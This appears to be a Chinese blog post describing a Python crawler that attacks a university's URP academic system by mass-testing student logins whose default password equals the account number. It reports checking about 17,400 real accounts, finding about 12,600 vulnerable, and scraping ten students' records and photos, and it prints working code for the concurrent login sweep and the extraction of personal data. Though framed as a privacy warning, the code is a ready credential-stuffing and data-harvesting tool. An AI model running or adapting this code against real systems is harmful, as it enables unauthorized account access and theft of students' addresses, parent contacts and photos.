你的個人資訊正暴露在網際網路中！Python 爬蟲獲取 URP 教務系統學籍資訊

擺碼王子發表於2018-02-11

原文網址 : https://juejin.im/post/5a80018df265da4e8a31e80e

你的個人資訊正暴露在網際網路中！Python 爬蟲獲取 URP 教務系統學籍資訊

原創文章，轉載務必註明原文連結！

初衷

本文旨在提醒同學們及時修改密碼，增強保護個人隱私的意識，因此程式碼中一些關鍵資料以及校名等資訊不會公開！複製貼上文章中的程式碼不會爬到任何東西。只是作為學習 Python 爬蟲的一點總結而已！

作者所在學校的教務系統安全防範措施可謂非常不嚴密，學生登入甚至不需要圖形驗證碼。每年學生入學之後，學校下發的賬號，初始密碼不是無規律的，而是和賬號完全一致！如果學生不及時修改密碼，那麼其他人可以輕鬆登入他的賬號。登入後可以看到學生的學籍資訊，包括高考報名時照片，家長聯絡方式等，聯絡地址甚至詳細到幾單元幾樓幾號門，個人資訊洩露情況非常嚴重！

結果

先說結果。經過兩天連寫帶除錯，終於完成了對全校本科生 17400 多個在網賬號的測試，其中有 12600 多個賬號使用的還是初始密碼。此處隱去校名，統計結果如下：

序號	學院	年級	在網賬號	可爬賬號	年級佔比
1	本一	2014	3157	1998	63.29%
2	本一	2015	3328	2234	67.13%
3	本一	2016	3641	3066	84.21%
4	本一	2017	3497	3326	95.11%
5	本三	2014	1759	303	17.23%
6	本三	2015	1643	620	37.74%
7	本三	2016	1605	1434	89.35%
8	本三	2017	1552	639	41.17%

介於初衷，只爬了 10 個賬號的資訊，以示嚴重性！

過程

本人之前做過近 2 年的 Java 相關開發，對 HTTP 協議中常用的知識瞭解一些，再加上 Python 出了名的簡潔易用，因此入門還是比較輕鬆的。去年有一段時間研究過一陣子 Python，使用的是 Scrapy 框架，所以這一次我也首先想到了 Scrapy。

Scrapy 這種框架適用的情形是：已經獲取了需要爬取的頁面的一系列 URL ，或者 URL 是成一定規律變化的，不需要登入或者登入一次拿到 Cookie 就可以拿著這個 Cookie 一直用了。但是教務系統完全相反，它需要每次都進行登入，也許 Scrapy 有辦法，但也不會太簡單，索性自己寫。

這套教務系統雖然安全性不怎麼樣，但也已是一套成熟的產品了，功能和穩定性上還是很不錯的。

首先使用 Firefox 瀏覽器的開發者工具檢視 HTTP 通訊的一些資訊：

登入表單通過 POST 請求進行提交，引數是賬號和密碼，傳送的也是明文

伺服器返回的響應中 Set-Cookie 就相當於給使用者下發的令牌，使用者下一次請求的時候帶上這塊令牌，伺服器就能認出來這個使用者是否剛登入過。這個令牌是有時間限制的，每次請求都會重新整理一次時間，如果兩次請求之間間隔時間超過設定值，那麼伺服器就不認識使用者了，這次會話就結束了，需要重新登入。

剛開始使用的是 requests ，用 for 迴圈實現，由於 requests 是同步的，所以效率很低，還會經常卡死。後來改成了協程，用的 gevent + urllib3，效率提升了上百倍。解析 HTML 用的 lxml 的 etree，圖片的儲存用 PIL 的 Image。

先引入依賴

import sys
import logging
import gevent
import urllib3
import pathlib
from PIL import Image
from io import BytesIO
from lxml import etree
複製程式碼

建立 HTTP 連線池

http = urllib3.HTTPConnectionPool(
	host=settings.SERVER_HOST,
	port=settings.SERVER_PORT,
	strict=False,
	maxsize=100,
	block=False,
	retries=100,
	timeout=10
)
複製程式碼

請求頭的一些固定資訊可以預先設定好，偽裝瀏覽器

header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Encoding': 'gzip, deflate',
	'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
	'Cache-Control': 'max-age=0',
	'Connection': 'Keep-alive',
	'Host': settings.SERVER_HOST,
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
}
複製程式碼

登入並驗證是否是初始密碼

# 賬號校驗器
class InfoValidate(object):
	def __init__(self):
		self.logger = InfoMain.logger
		self.http = InfoMain.http
		# 有效賬號
		self.account_valid = []
		# 可爬賬號
		self.account_available = []

	def validate(self, all_account):
		# 將所有校驗過程加入佇列
		jobs = [gevent.spawn(self.validate_account, self.http, a) for a in all_account]
		gevent.joinall(jobs, timeout=0)

	def validate_account(self, http, account):
		# 登入請求引數
		param = {"zjh": account, "mm": account}
		header = headers.header
		response = http.request('POST', settings.URL_LOGIN, fields=param, headers=header)
		self.logger.info('傳送請求>>{}'.format(param))
		self.logger.info(response.status)
		# 響應體解碼
		res_text = response.data.decode('GB2312', 'ignore')

		if res_text.find('密碼不正確') > -1:
			# 密碼有誤
			self.account_valid.append(account)
		elif not res_text.find('證件號不存在') > -1:
			# 賬號可爬
			self.account_available.append(account)
			self.account_valid.append(account)
			self.logger.info("賬號可用>>>{}".format(account))
複製程式碼

至此已經獲取了所有初始密碼未修改的賬號了，下面研究一下，要爬取的學籍資訊頁的規律

一系列的資訊都包裹在 <td width = "275"></td>之間，對應的 xpath 表示式即為 //td[starts-with(@width,"275")]/text()

基於之前對賬號的測試，爬取學籍資訊

# 資訊收集器
class InfoCollect(object):
	def __init__(self):
		self.logger = InfoMain.logger
		self.http = InfoMain.http
		# 功能模組
		self.mod_get_roll_info = settings.MOD_ROLL_INFO
		self.mod_get_roll_img = settings.MOD_ROLL_IMG

	def get_info_queue(self, accounts):
		# 將所有資訊收集過程加入佇列
		jobs = [gevent.spawn(self.get_info, a) for a in accounts]
		gevent.joinall(jobs, timeout=0)

	def get_info(self, stuid):
		# 登入
		param = {'zjh': stuid, 'mm': stuid}
		response = self.http.request('POST', settings.URL_LOGIN, fields=param)
		# 儲存 Cookie
		cookie = response.headers['Set-Cookie'].replace('; path=/', '')
		header = headers.header
		header['cookie'] = cookie
		# 學籍資訊
		if self.mod_get_roll_info:
			# 帶 Cookie 訪問學籍資訊頁
			response_xjxx = self.http.request('GET', settings.URL_XJXX, headers=header)
			text = response_xjxx.data.decode('GB2312', 'ignore')
			# 解析頁面內容
			selector = etree.HTML(text)
			text_arr = selector.xpath('//td[starts-with(@width,"275")]/text()')
			# 學籍資訊
			result = []
			for info in text_arr:
				result.append(info.strip())
			self.save_info(result)
		# 學籍照片
		if self.mod_get_roll_img:
			response_xjzp = self.http.request('GET', settings.URL_XJZP, headers=header)
			image = Image.open(BytesIO(response_xjzp.data))
			setpath = settings.PATH_IMG_SAVE
			path = pathlib.Path(setpath)
			if not path.exists():
				path.mkdir()
			setpath = setpath + '/' + stuid + '.jpg'
			image.save(setpath)
			self.logger.info('儲存照片>>>{}'.format(setpath))

		# 登出
		self.http.request('POST', settings.URL_LOGOUT, headers=header)
複製程式碼

至此，已經實現了所有資訊的獲取以及照片的儲存。

沒改密碼的同學們應該看到了，獲取個人資訊其實很簡單，關鍵在於增強自己保護個人資訊的意識。

相關開源專案：URP_Spider github.com/JamesZBL/UR…

最簡單的網路圖片的爬取 --Pyhon網路爬蟲與資訊獲取
2020-04-04
爬蟲
Python 爬蟲獲取網易雲音樂歌手資訊
2019-03-04
Python爬蟲
利用Python爬蟲獲取招聘網站職位資訊
2021-08-09
Python爬蟲網站
[Python] 網路爬蟲與資訊提取（1）網路爬蟲之規則
2020-11-06
Python爬蟲
python網路爬蟲_Python爬蟲：30個小時搞定Python網路爬蟲視訊教程
2020-10-21
Python爬蟲
python爬蟲——爬取大學排名資訊
2019-08-02
Python爬蟲
用Python網路爬蟲獲取Mikan動漫資源
2020-08-26
Python爬蟲
python爬蟲，獲取中國工程院院士資訊
2021-12-04
Python爬蟲
小白學 Python 爬蟲（25）：爬取股票資訊
2019-12-24
Python爬蟲
Python爬蟲訓練：爬取酷燃網視訊資料
2020-10-23
Python爬蟲
怎麼利用Python網路爬蟲來提取資訊
2020-03-20
Python爬蟲
這些美食你吃過嗎！使用Python網路爬蟲獲取菜譜圖文資訊一起學習
2020-09-26
Python爬蟲
爬蟲實踐之獲取網易雲評論資料資訊
2022-03-29
爬蟲
Python一鍵爬取你所關心的書籍資訊
2019-03-05
Python
python爬蟲--爬取鏈家租房資訊
2020-05-16
Python爬蟲
爬蟲Selenium+PhantomJS爬取動態網站圖片資訊（Python）
2018-03-24
爬蟲JS網站Python
python爬蟲獲取天氣網實時資料
2022-11-29
Python爬蟲
【Python爬蟲】正則爬取趕集網
2020-12-24
Python爬蟲
Python 系統資源資訊獲取工具，你用過沒？
2018-11-28
Python
python例項，python網路爬蟲爬取大學排名!
2018-11-20
Python爬蟲
python爬蟲58同城（多個資訊一次爬取）
2018-11-04
Python爬蟲
網際網路時代，如何防止個人資訊洩露
2018-07-25
網路爬蟲如何獲取IP進行資料抓取
2022-05-19
爬蟲
python爬蟲獲取搜狐汽車的配置資訊和swf動態圖表的銷量資料-------詳細教學
2019-08-05
Python爬蟲
python網路爬蟲（7）爬取靜態資料詳解
2019-06-07
Python爬蟲
使用URLConnection物件獲取網路資源資訊
2020-11-10
物件
python爬蟲練習之爬取豆瓣讀書所有標籤下的書籍資訊
2018-07-23
Python爬蟲
java爬取豆瓣書籍資訊
2019-01-03
Java
權利義務框架下的移動網際網路APP個人資訊保護——《個人資訊保護法》對APP個人資訊保護影響分析
2021-11-03
框架APP
Python爬蟲實戰：爬取淘寶的商品資訊
2021-09-11
Python爬蟲
selenium 知網爬蟲之根據【關鍵詞】獲取文獻資訊
2023-10-28
爬蟲
Python爬蟲爬取淘寶，京東商品資訊
2020-02-11
Python爬蟲
python爬蟲--招聘資訊
2018-11-03
Python爬蟲
python-python爬取豆果網（菜譜資訊）
2019-01-22
Python
爬蟲利器Pyppeteer的介紹和使用爬取京東商城書籍資訊
2020-09-22
爬蟲
Python爬蟲初學二（網路資料採集）
2020-05-03
Python爬蟲
Java爬蟲-爬取疫苗批次資訊
2024-06-03
Java爬蟲
如何用python爬蟲分析動態網頁的商品資訊？
2021-09-11
Python爬蟲網頁
HarmonyOS 如何獲取裝置資訊（系統、版本、網路連線狀態）
2024-11-08

你的個人資訊正暴露在網際網路中！Python 爬蟲獲取 URP 教務系統學籍資訊

初衷

結果

過程

相關文章